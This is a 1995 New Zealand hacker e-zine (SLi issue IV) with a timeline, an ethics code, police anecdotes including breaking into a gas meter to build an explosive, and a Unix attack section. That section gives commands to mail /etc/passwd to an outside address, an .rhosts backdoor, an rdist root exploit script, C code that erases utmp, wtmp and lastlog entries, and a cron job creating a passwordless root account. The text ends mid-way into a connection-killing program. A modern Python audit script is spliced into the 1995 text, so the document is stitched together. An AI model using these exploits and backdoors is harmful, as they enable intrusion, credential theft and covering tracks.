[ 01/04/95 SLi]

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^          Welcome           ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Well, amazing! SLi IV. Let's see if we can keep this up.

If you want a letter to the editor or something like that in here, send it (or any comments, etc.) to:

    SLi
    PO Box 3030
    Onekawa
    Napier
    New Zealand

OR Internet E-mail Address: HACKER_M@IX.WCC.GOVT.NZ

OR call SLi BBS if you can find where it is.

Please read SLi I, II & III if you have trouble with any terms in this mag.

SLi mag written by New Zealanders for New Zealanders!

Oh, before I forget, we have a NEW editor (I'm still here tho'). CyntaxEra is now a Co-Editor and designer of the mag. Its outlay and overall presentation is her domain, well unless I get bossy.

I N D E X
---------

Welcome ........................... Eon
The Rules ......................... Eon
Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
The Police ........................ Eon
Time Line ......................... Eon
Books 2 Read ...................... SLi
[In]Famous Quotes ................. Eon
Honour ............................ Eon
Unix .............................. Compiled by Eon
Busted 4 Nothing .................. Eon/Cyntaxera
The SLi Archive Subject list ...... Eon
Fake Mail ......................... Eon
Elements of Data Deprotection ..... Thorium
Review: 'ToT' ..................... CyntaxEra
SLi ............................... Eon
COCOT Phreaking in NZ ............. CyntaxEra
SmYte List ........................ SLi
Editors Knotez .................... Eon

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^         The Rules          ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Okay, here are the rules for the SLi mag.
The entire mag is (C)opyright 1995 SLi

(1) If you are working for a business that has some interest in the information contained in this mag, you must send WRITTEN notification that you are in possession of this [or any of the other SLi mags] to the following address:

    SLi-Comp
    PO Box 3030
    Onekawa
    Napier
    New Zealand

    Enclose your name, your company's name, address, and phone/fax number.

    If you send an IBM formatted 720 disk and a SASE, we will send you the next SLi mag. A donation of $5 is asked for however - as YOU can afford it (unlike SOME of our readers).

(2) This mag may not be edited, and no SINGULAR part may be quoted in any way! However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be expected to be paid to the following address BEFORE any such reproduction.

    SLi-Payment
    PO Box 3030
    Onekawa
    Napier
    New Zealand

    Enclose your name, your company's name, address, and phone/fax number.

    The fee must be paid in $CASH$. I, the editor, reserve the right to revoke your rights to reproduce this mag at ANY time.

You may, if you are NOT a company, business or in any way connected to law enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies for no charge.

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed we've managed to get out another issue before anything drastic had happened to restrict our printing, but even so, tough.

Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the last issue..)..

Greetz go out to: [in absolutely NO order at all..]

SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you still want summink.. ;)], Tele [how's the bf/husband?
;)], max-q, ChezeHead, motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS, DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent, UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX, UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro, qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby - (where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d, Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.

[..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry - maybe all that p0t actually HAS gone to my head.. ugh. ;)]

Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which means that there isn't much to talk about.. oh yeah... CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)

Doesn't that show how little there is to say this time round?! Uh, I guess I could beg and plead for pieces of gossip to head our way (yup, even BBS ads will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em.. Well, if there's enuf submitted, that is..)..

Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as HONEST as I could be without being TOO cutting (I got told I was a little harsh with the comments, but I felt that they were appropriate - it's only an opinion so don't take it personally.. =) ). Well, to you other readerz out there who aren't in ToT, give it a read - you may find it amusing.. =) Oh, it's a pity that I've been informed that ToT#2 was going to be the last issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we hadn't really started out TOO magnificently* Mind you... it was a start].

Telco seems to be backing down for a bit, but that doesn't mean that they've stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)

[Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she says. She's a nice woman - just a bit slY WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude ISNT. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR]

Special note to "THE FLY" - You've pissed me off once too often, and after hearing of your comments, you'll get what's coming for you. Oh, and I'm sure you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were doing a bit of a crackdown on fone-phreaks and your name popped up somehow. Pity they're too far away to seriously do something about it - don't think they could be bothered, huh?

That's about it from me.. for now

'Till next issue (well, next article anyway.. ;) )... over and OUT.

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^         The Police         ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

-The Police-

Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...

We ALL know police, don't we? Now, I thought that police were there to protect, BUT....

It all happened one EARLY morning - about 5am. We were, uh, well, breaking into a gas-meter to get some gas to fill a rubbish bag with to make a bit of a large explosion somewhere in the metropolitan area. Now, sadly :( me and another individual were smacking the shit outta this gas meter's pipes and we hear a car driving towards where we were. We [by the way, we were in a car - not at that moment, obviously] dropped the crowbar [that's what we were talking to the gas-meter with] and hid behind the car. Unfortunately, the police had seen us, so I [holdin' a spanner] tried to look like we were undoing the wheel [There was a stone in it. Well, that was the story anyway].

Now, the cops asked us questions, searched our car for drugs and basically harassed us until EXACTLY 6:30am [it mighta been 5:30am]. Anyway, I was informed that that is the EXACT time the police go home, so all we were was a 'time-waster'.
I must admit that I have lost some respect I had for the boys/'girl-boys' in blue. The car-driver's mom got called and he got in shit. We had to walk back and pick up the crowbar we had left 'hidden in plain sight' - they somehow managed to miss it - and basically, we had a really bad day [morning]...

BTW - Cops ask really STUPID questions!

Cop: Why is there broken glass near that car??
Me:  I dunno, but if you were a _real_ detective, you would notice that the broken glass is nowhere near the broken window. Obviously the car has been moved since the glass was broken so we CAN'T have done it.

Cop: You ever had a run in with us before?
Me:  [thinking] What a fucking stupid question to ask! I told you my name so why don't you just look it up?
     [saying] Just the usual - being out late and getting stopped. Nothing really.

Cop from Vice squad: Been smoking any dak? [dak = pot/green plant/cannabis]
A friend: I wish.

Well, I have no problems with police, except that _SOME_ policewomen have a really bad attitude and that some policemen think that they are god's gift to the world. But, the police do a job that MUST be done. I salute them for it... BUT, Mr/Ms Police Officer, take my advice and do what is righteous and just, not necessarily what is legal.

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^         TIME LINE          ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Well, here we have it. A timeline of events in the H/P world. Now, I might have screwed up a few things so please no mail bombs and bear with me.

Information and Dates have been taken from:

"The Hacker Crackdown"          ---- Bruce Sterling
"THEFT OF COMPUTER SOFTWARE     ____ William J. Cook,
 A NATIONAL SECURITY THREAT"         Assistant U.S. Attorney
PGP DOX                         ---- Author Unknown at time of Publication.
"The History of LOD/H           ____ Lex Luthor
 Revision #3 May 1990"
U.S. Newswire                   ---- Author Unknown at time of Articles Publication.
News Article                    ____ Barbara E. McMullen and
Pump-Con Bust -03/11/1992-           John F. McMullen

and finally, my own knowledge.

KEY:
Okay, the only major thing I should explain is the use of "Sometime." and "Sometime?". A question mark means I'm not sure WHEN it happened in that year. A "." means I'm not sure of which month things happened, but it was in this order.

-=[ Our History ]=-

1865: U.S. Secret Service (USSS) founded.
1876: Alexander Graham Bell invents telephone.
1878: First teenage males flung off phone system by enraged authorities.
1939: "Futurian" science-fiction group raided by Secret Service.
1971: Yippie phone phreaks start YIPL/TAP magazine.
1972: *Ramparts* magazine seized in blue-box rip-off scandal.
1978: Ward Christensen and Randy Suess create first personal computer bulletin board system.
1982: William Gibson coins term "cyberspace."
1982: "414 Gang" raided.
1983-1984: AT&T dismantled in divestiture.
1984: Congress passes Comprehensive Crime Control Act giving USSS jurisdiction over credit card fraud and computer fraud.
1984: The U.S. Department of Commerce placed expanded export controls on computer software as part of its general protection of technical data deemed vital to the national defense and security of the United States.
1984: "Legion of Doom" formed.
      January. "PLOVERNET" went online. [A H/P BBS]
      Sometime? "LOD BBS" goes online.
      Sometime? Groups such as "Fargo 4A" and "Knights of Shadow" form.
      Sometime May?. "KOS" breaks up.
1984: *2600: The Hacker Quarterly* founded.
1984: *Whole Earth Software Catalog* published.
1985: First police "sting" bulletin board systems established.
1985: Whole Earth eLectronic Link computer conference (WELL) goes on-line.
1986: Computer Fraud and Abuse Act passed in USA.
1986: Electronic Communications Privacy Act passed in US.
1987: Chicago prosecutors form Computer Fraud and Abuse Task Force.
      July/September. A Chicago youth attacked AT&T computers at Bell Labs in Illinois and New Jersey, at a NATO missile support site in North Carolina, and at Robbins Air Force Base.
1988:
      July. Secret Service covertly videotapes "SummerCon" hacker convention.
      September. "Prophet" cracks BellSouth AIMSX computer network and downloads E911 Document to his own computer and to Jolnet.
      September. AT&T Corporate Information Security informed of Prophet's action.
      October. Bellcore Security informed of Prophet's action.
      October. Scotland Yard arrested an English attacker who had broken into over 200 military, corporate, and university computers in the United States and Europe.
      November 2. A college undergraduate planted a computer virus that temporarily disabled 6,000 computers on the Internet [* The Internet Worm *]
      December. A search warrant filed by U.S. Customs agents in Chicago disclosed that a confederate of the Yugoslav Consul-General in Chicago was using a hacker to attack defense contractors by remote access in order to steal computerized information. According to the affidavit, the information obtained by the hacker was subsequently smuggled out of the United States in diplomatic pouches with the help of the Consul-General.
1989:
      January. Prophet uploads E911 Document to Knight Lightning.
      February 25. Knight Lightning publishes E911 Document in *Phrack* electronic newsletter.
      March. It was disclosed that West German hackers sponsored by Eastern Bloc intelligence agencies had been systematically searching for classified information on Government computers throughout the United States through a weakness in a computer network at a California university. [* Pengo and Operation Equalizer *]
      March. A member of the Soviet military mission in Washington, DC, was arrested and expelled from the United States for attempting to obtain technical information about how U.S. Government classified information is secured in computers.
      April. Canada expelled 19 Soviet diplomats for wide-ranging espionage operations to obtain Canadian defense contractor information for military and commercial purposes.
      May. Chicago Task Force raids and arrests "Kyrie."
      June. "NuPrometheus League" distributes Apple Computer proprietary software.
      June 13. Florida probation office crossed with phone-sex line in switching-station stunt.
      July. "Fry Guy" raided by USSS and Chicago Computer Fraud and Abuse Task Force.
      July. Secret Service raids "Prophet," "Leftist," and "Urvile" in Georgia.
1990:
      Sometime? PGP (Pretty Good(tm) Privacy) created by Philip Zimmermann.
      January 15. Martin Luther King Day Crash strikes AT&T long-distance network nationwide.
      January 18-19. Chicago Task Force raids Knight Lightning in St. Louis.
      January 24. USSS and New York State Police raid "Phiber Optik," "Acid Phreak," and "Scorpion" in New York City.
      February 1. USSS raids "Terminus" in Maryland.
      February 3. Chicago Task Force raids Richard Andrews' home.
      February 6. Chicago Task Force raids Richard Andrews' business.
      February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile.
      February 9. Chicago Task Force arrests Knight Lightning.
      February 20. AT&T Security shuts down public-access "attctc" computer in Dallas.
      February 21. Chicago Task Force raids Robert Izenberg in Austin.
      March 1. Chicago Task Force raids Steve Jackson Games, Inc., "Mentor," and "Erik Bloodaxe" in Austin.
      May 7,8,9. USSS and Arizona Organized Crime and Racketeering Bureau conduct "Operation Sundevil" raids in Cincinnati, Detroit, Los Angeles, Miami, Newark, Phoenix, Pittsburgh, Richmond, Tucson, San Diego, San Jose, and San Francisco.
      May. FBI interviews John Perry Barlow re NuPrometheus case.
      June/July. Mitch Kapor and Barlow found Electronic Frontier Foundation; Barlow publishes *Crime and Puzzlement* manifesto. [*The official EFF "about.eff" says EFF founded in July*]
      July 10. Members in LOD plead guilty.
      July 24-27. Trial of Knight Lightning.
1991:
      Sometime? US Senate Bill 266, an omnibus anti-crime bill, had an unsettling measure buried in it.
      If this non-binding resolution had become real law, it would have forced manufacturers of secure communications equipment to insert special "trap doors" in their products, so that the US Government can read anyone's encrypted messages. This measure was defeated after rigorous protest from civil libertarians and industry groups.
      March 25-28. Computers, Freedom and Privacy conference in San Francisco.
      May 1. Electronic Frontier Foundation, Steve Jackson, and others file suit against members of Chicago Task Force.
      July 1-2. Switching station phone software crash affects Washington, Los Angeles, Pittsburgh, San Francisco.
      July 8. MOD indictments filed against MOD members Julio Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt," Mark Abene, aka. "Phiber Optik," Elias Ladopoulos, aka. "Acid Phreak," and Paul Stira, aka. "Scorpion."
      February. CPSR Roundtable in Washington, D.C.
      September 17. AT&T phone crash affects New York City and three airports.
1992:
      Sometime? FBI Digital Telephony wiretap proposal was introduced to Congress. It would require all manufacturers of communications equipment to build in special remote wiretap ports that would enable the FBI to remotely wiretap all forms of electronic communication from FBI offices.
      March 11. New York Police Department has announced the arrest of Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for the alleged crimes of Unauthorized Use Of A Computer and Attempted Computer Trespass, both misdemeanors. Also arrested was Jason A. Brittain, 22, in satisfaction of a State of Arizona Fugitive From Justice warrant. The arrests took place in the midst of "PumpCon".
1993:
      Sometime. SLi BBS goes up in NZ.
      March 21. SLi gets national TV coverage from TVNZ.
      April 16th. US Government-built encryption device, called the "Clipper" chip, containing a new classified NSA encryption algorithm. The Government is encouraging private industry to design it into all their secure communication products.
      The catch: At the time of manufacture, each Clipper chip will be loaded with its own unique key, and the Government gets to keep a copy.
      June. DC busts - A 2600 meeting is broken up by mall cops and police.
1994:
      March. TNO [The New Order] gets busted; Flatline BBS is raided.
      Sometime. Unlucky person nailed in Auckland, NZ, for around $250,000 of fone fraud concerning NZ Telecom ($200,000) and AT&T ($40,000).
      Sometime. Phreak in Wellington busted for beige boxing by Clear Communications, NZ.
      Sometime. Big Calling Card investigation in NZ - "Motley" in Sweden is busted in conjunction with CC'z - no major charges are laid.
      June 10. "Deathstar" gets busted - no charges laid.
      August 6. "Tooph" makes front page news with his alliance conf calls - One was a call to NZ for 293 mins costing $306.
      Sometime. "MrPurple" busted for US$40,000 worth of conference charges. [* At time of publication, in jail =( *]
      Late/Early95. NZ Telecom hassles Wellington phreaks about VMB hacking. [how lame!].
1995:
      January. Wellington H/P'ers hunted down by Victoria University (with a little help from local cops) 'cos someone got 'OPERATOR' on their boxes. [Yeah, wasn't 'root' but it scared 'em enuf!]
      February 17. Hacker Busted in USA for 20.000 credit cards
                   Kevin Mitnick aka Condor
      March 22. S.A.M.S.O.N meeting in Wellington, New Zealand
                "1. To identify interested parties in joining our proposed organisation - namely SAMSON - Software and Modem System Operators Network!
                 2. To establish and agree on a formal code of ethical practices for the successful running of a public BBS."
                [* well they will wanna shut me down, won't they! :P *]

-eof-

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^     [In]Famous Quotes      ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

----Eon,---Grasshopper-+-others---in--a---car----

Eon: "Let's go crash some place."
Grasshopper: "I hope you meant as in sleeping."

Grasshopper: "He's `Joe-average'"
Eon: "He's `Joe-BELOW average'"

George: "I'll lock you out of my Bulletin Board and give you twit access forever! Ahh ahahahaha!" [spoken in a voice like he had an award winning carrot up his ass]

Cardinal: "Dial '111' and make a cop come."

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^           Honor            ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Honor.

For a hacker to justify his/her actions, he/she must have a guideline of rules of morals - a sense of honour. Some do, some don't, but I hope to show you what Hack/Phreak people's ethics should be, in my opinion.

1. For a start, injuring a single person; CC abuse is wrong. It is not ethical. Our fight is not against the little man or woman - our fight is against the profiteering companies and hiracial[sp?] government departments. We do not steal from the poor, and the helpless, and in a sense, that is what CC fraud is most of the time. Sure, occasionally you get some rich guy with 40 grand in his account, but those times are few and far between. Basically CC fraud is out. Beige boxing is out also, unless you're phreaking from an embassy, government department or Telecom [AT&T, Telco.. etc...] phone box.

2. You're not an anarchist [in the explosive terms]. It only gives us a bad name.

3. Destroying data, except for covering your tracks, is out.

4. Your world is that of the computer and the phone. Our world is safe from the problems of racial prejudice, sexual discrimination, discriminate by what someone says - not what they look like, sound like, or what their beliefs are.

5. Our word of honour is PERMANENT. If given, NEVER break it. If you do, you are no more worthy of your position in society as a murderer or a rapist.

6. Respect all others' points of view - even if it is foolish.

7. NEVER attack anything if it hasn't done anything to you. [Hmm, does that include kicking poor, little, defenseless PUPPIES!?]

8. Don't talk behind others' backs.
   If you want to say something, say it to their face. Only dishonourable people don't tell people what they think, but tell others instead.

Remember, our war is the war that will shape the future. If we are not ever diligent, we will lose our rights as an individual - we will become nothing more than a number. Governments love numbers, as do all money making companies. Protect the little free speech and the few rights we have left. Protect them well, my brethren, for we will need it one day more than we will need anything else.

Above all, our war is directed at big businesses and governments, not towards random people in our streets.

Eon.

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^            UNIX            ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors can use it, although 8088's will have to use a UNIX-like OS, not a UNIX OS, but 486's, 386's, Pentiums, and the like can run it. SUN boxes and VAX's can run it. In fact, that's the amazing thing about Unix - it's PORTABLE!

Anyway, away from the dribble. I guess I'll start at the top.

Basic UNIX username/password prompt:

    login:
    Password:

This CAN be changed. After all, with UNIX, you get the source to everything.

One good thing with UNIX is that the password file is globally readable unless the system administrator has enabled a shadow password system - not standard with unix. The passwords are in:

    /etc/passwd

Mind you, this can be changed also. After all, with UNIX, you get the source to everything.
A UNIX passwd file looks like this:

    root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
    jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
    peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
    jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
    bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
    jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
    mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
    paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
    anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
    ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
    user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
    andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh

The layout may differ between UNIXes, but this is the standard layout:

    Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell

You will notice that the second field is the password one. UNIX uses a one-way password encryption system. When you log in and type your password, it encrypts your input and compares the result to the user's password field. If it is the same, you've got the password right.

Say you want to crack the passwords. You have to do the same. Encrypt a sequence of letters/numbers/symbols and compare them to the password file. Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..". What you get is a dictionary file which looks like this:

    autistic
    auto
    autobiography
    autoclave
    autocollimate
    autocorrelate
    autocracy
    autocrat
    autocratic
    autograph
    automat
    automata
    automate
    automatic

The reason for this - using dictionary words - is that a LOT of people just use common words as their passwords. Having to attack "Crack" using every number/letter/symbol sequence UNIX can handle would take a LONG time.
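
Added example (not part of the original mag): the seven-field layout described above is easy to audit from the administrator's side. This Python code flags entries whose hash sits in the world-readable file instead of a shadow file, empty password fields, extra UID 0 accounts, shared UIDs and malformed lines; the sample file, account names and issue labels are constructed for illustration.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "line_no user issue")

# Traditional DES crypt(3) output: 2-char salt + 11-char hash, 13 chars total.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
# Modular crypt format used by later schemes, e.g. "$1$salt$hash".
MODULAR_CRYPT = re.compile(r"^\$[0-9A-Za-z-]+\$.+")

# Constructed sample in the Username:Password:UID:GID:Info:Home:Shell layout.
SAMPLE_PASSWD = """\
root:x:0:0:Superuser:/root:/bin/sh
alice:AbCdEfGhIjKlM:1001:20:Constructed user:/home/alice:/bin/sh
tempacct::0:0:Constructed account:/:/bin/sh
bob:*:1002:20:Locked account:/home/bob:/bin/false
carol:x:1001:20:Shares alice's UID:/home/carol:/bin/sh
broken:x:1003:20:/home/broken
"""


def audit_passwd(text):
    """Return a list of Finding tuples for passwd-format text."""
    findings = []
    uid_owner = {}  # first account seen for each UID
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        user = fields[0]
        # A valid entry has exactly seven fields and a numeric UID.
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append(Finding(line_no, user, "malformed"))
            continue
        password, uid = fields[1], int(fields[2])

        if password == "":
            # Anyone can log in to this account without a password.
            findings.append(Finding(line_no, user, "empty-password"))
        elif DES_CRYPT.match(password) or MODULAR_CRYPT.match(password):
            # Hash readable by every local user: open to offline guessing.
            findings.append(Finding(line_no, user, "hash-in-passwd"))
        # Markers such as "x" or "*" mean shadowed or locked: no finding.

        if uid == 0 and user != "root":
            # A second superuser account is a classic persistence trick.
            findings.append(Finding(line_no, user, "extra-uid0"))
        elif uid != 0 and uid in uid_owner:
            # Two names on one UID share files and blur audit trails.
            findings.append(Finding(line_no, user, "duplicate-uid"))
        uid_owner.setdefault(uid, user)
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.issue}")
```

Run it against a copy of the real file by passing `open("/etc/passwd").read()` to `audit_passwd`; a clean, shadowed system returns an empty list.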
The names of some good proggies that crack these passwords are: Program Name File Name <> OS ~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~ Cracker Jack jack13.zip/jack.zip Killer Cracker kc9??.zip Useful commands to type WHENEVER you get onto ANY UNIX system: [] = Don't type - instructions * = What you type This will "type" the password file to your terminal: [open a capture if on a modem link] *cat /etc/passwd [or] *ypcat passwd This will mail you via internet with the password file: *cat /etc/passwd |mail -s passwordfile [where you want to send the file to via internet mail; ie. bloggs@some.where.com] ypcat passwd | mail -s passwordfile [where you want to send the file to via internet mail; ie.bloggs@some.where.com] Also type this: *echo + + >> ~/.rhosts This will allow you (if it's installed) for you to type: *rsh -l /bin/sh -i Okay, so that is say, the user you echoed + + on was called "bob" on lame.aol.com, you would type: *rsh lame.aol.com -l bob /bin/sh -i This might or might not work, depending on how the system is setup, but if you were on lame.aol.com, it's a reasonable bet after typing that command you would then become bob with his rights, and access to his files. Well I thought about it and decided to put some useful source in here for those interested. Okay, this piece of shell script on non-patched systems will give you root. Upload this file into a directory as . When in shell on the UNIX box type: *chmod 777 *./ */tmp/." " If a # appears, type: *whoami If it says "root" you have root on that UNIX box. NB: Because of the way this file is, where ! is wrap the nextline onto that line and delete the "!" - except for the "#!" on the first line. ---------------------------CUT----------------------------8<------------------ #!/bin/sh SUID=/tmp/." " cat <<_EOF_ > test Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh $SUID Schmod 4755 $SUID _EOF_ cat test | /usr/ucb/rdist -Server localhost rm -rf test if [ -f $SUID ]; then echo "$SUID is a setuid shell. " fi -------------------------CUT-------------------------------8<------------------ The program following will hide you on a UNIX box. It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if you are root. 
-------------------------CUT-------------------------------8<------------------ #include #include #include #include #include #include #include int f; void kill_tmp(name,who) char *name, *who; { struct utmp utmp_ent; if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_tmp("/etc/utmp",argv[1]); kill_tmp("/usr/adm/wtmp",argv[1]); kill_lastlog(argv[1]); printf("Zap!\n"); } else printf("Error.\n"); } -----------------------------CUT---------------------------8<------------------ When you get root, find where the crontabs are put, and type this: *cat >> /root -------------->8--------------Cuthere------------------------------------------ 0 1 * * * cp /etc/passwd /var/adm/". " 1 1 * * * chmod +w /etc/passwd 2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd 1 2 * * * mv /var/adm/". " /etc/passwd 2 2 * * * chmod -w /etc/passwd -------------->8--------------Cuthere------------------------------------------ At 1-2 AM, there will be an account called "blah" with root access every day created with no password. This will nuke the IP connection between two computers: *./nuke -------------->8--------------Cuthere------------------------------------------ /* * nuke.c version 1.0 04/25/92 * by Satanic Mechanic. * must be root to open raw sockets. this version will kill * almost any ip connection. 
